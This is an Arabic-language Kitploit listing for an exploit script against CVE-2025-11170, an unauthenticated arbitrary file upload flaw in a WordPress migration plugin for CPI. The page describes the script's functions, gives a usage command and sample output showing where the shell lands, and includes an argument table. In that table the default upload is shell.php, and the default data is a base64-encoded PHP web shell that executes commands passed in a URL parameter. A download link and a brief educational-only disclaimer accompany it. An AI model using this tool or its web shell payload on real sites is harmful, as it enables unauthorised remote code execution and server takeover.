Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-11170 — مكوّن إضافي مخصص لترحيل ووردبريس لـ CPI <= 1.0.2 - رفع ملف تعسفي بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-11170
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubnxploited/cve-2025-11170

CVE-2025-11170

مكوّن إضافي مخصص لترحيل ووردبريس لـ CPI <= 1.0.2 - رفع ملف تعسفي بدون مصادقة

عرض المستودع
2منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-11170

WP移行専用プラグイン for CPI <= 1.0.2 - رفع ملف تعسفي بدون مصادقة

🚀 WP移行専用プラグイン for CPI <= 1.0.2 - رفع ملف تعسفي بدون مصادقة

📝 الوصف

يُعاني إضافة WP移行専用プラグイン for CPI الخاصة بووردبريس من ثغرة تسمح برفع الملفات التعسفية بسبب عدم التحقق من نوع الملف في الدالة Cpiwm_Import_Controller::import في جميع الإصدارات حتى 1.0.2.
يسمح هذا للمهاجمين غير المصادقين بـ رفع ملفات تعسفية إلى خادم الموقع المتأثر، مما قد يمكنهم من تنفيذ تعليمات برمجية عن بُعد.

🛡️ تفاصيل الثغرة

  • CVE: CVE-2025-11170
  • درجة CVSS: 9.8 (حرجة)
  • ناقل الهجوم: رفع ملف عن بُعد بدون مصادقة

⚡ معلومات السكربت

  • اسم السكربت: CVE-2025-11170.py
  • الغرض: أداة أوتوماتيكية لرفع شيل أو ملف لاستغلال إضافة ترحيل CPI الضعيفة.

🔧 الاستخدام

الوسائط

🚦 شرح الدوال

  • Nxploited_parse_args
    تحليل والتحقق من صحة وسائط الإدخال. يضمن بنية نقطة النهاية الصحيحة والترويسات وتشفير البيانات.

  • Nxploited_logging
    إعداد تسجيل متقدم ومستوى تفاصيل لإخراج مفصل أو مختصر أثناء التشغيل.

  • Nxploited_retry_session
    تهيئة جلسة دائمة مع منطق إعادة محاولة وتأخير للاتصالات المتينة.

  • Nxploited_build_payload
    بناء معاملات طلب POST للاستغلال.

  • Nxploited_send
    تنفيذ طلب POST الفعلي إلى نقطة النهاية الضعيفة وإدارة الردود/الأخطاء.

  • Nxploited_output_result
    معالجة وتنسيق الرد، عرض مسار الشيل عند النجاح، أو معلومات التصحيح خلاف ذلك.


💡 مثال استخدام

root@kitploit:~
python3 CVE-2025-11170.py -u "http://192.168.100.74:888/wordpress/" -f "shell.php"

مثال للإخراج:

root@kitploit:~
Uploading shell...
Processing response...
[+] Upload successful!
Shell path:
http://192.168.100.74:888/wordpress/wp-content/plugins/cpi-wp-migration/storage/shell.php
Nxploited
My GitHub: https://github.com/Nxploited

🚨 إخلاء مسؤولية

هذا السكربت مقدم لأغراض تعليمية فقط.
استخدام هذه الأداة على أهداف دون إذن مناسب قد يكون غير قانوني.
المؤلف لا يتحمل أي مسؤولية عن أي استخدام خاطئ أو أضرار أو عواقب قانونية.


📢 تواصل معي

GitHub: Nxploited
Telegram: KNxploited


بواسطة: Nxploited ( Khaled Alenazi )

تنزيل الأداة
الوسيطالوصف
-u, --urlعنوان الهدف الأساسي (مثل http://target.com/wordpress/). يضيف السكربت wp-admin/admin-ajax.php تلقائياً.
-f, --filenameاسم الشيل أو الملف المطلوب رفعه. القيمة الافتراضية: shell.php
-d, --dataمحتوى الملف بصيغة base64 (أو نص عادي). القيمة الافتراضية: PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+
-i, --indexقيمة حقل الفهرس. القيمة الافتراضية: 0
-H, --headersترويسات HTTP إضافية (بصيغة: X-Key:Value;K2:Value2)
-t, --timeoutمهلة طلب HTTP (بالثواني). القيمة الافتراضية: 10
--retriesعدد محاولات إعادة المحاولة. القيمة الافتراضية: 3
--backoffعامل التأخير بين المحاولات (بالثواني). القيمة الافتراضية: 0.7
-v, --verboseزيادة مستوى التفاصيل للتصحيح (قابل للتكرار)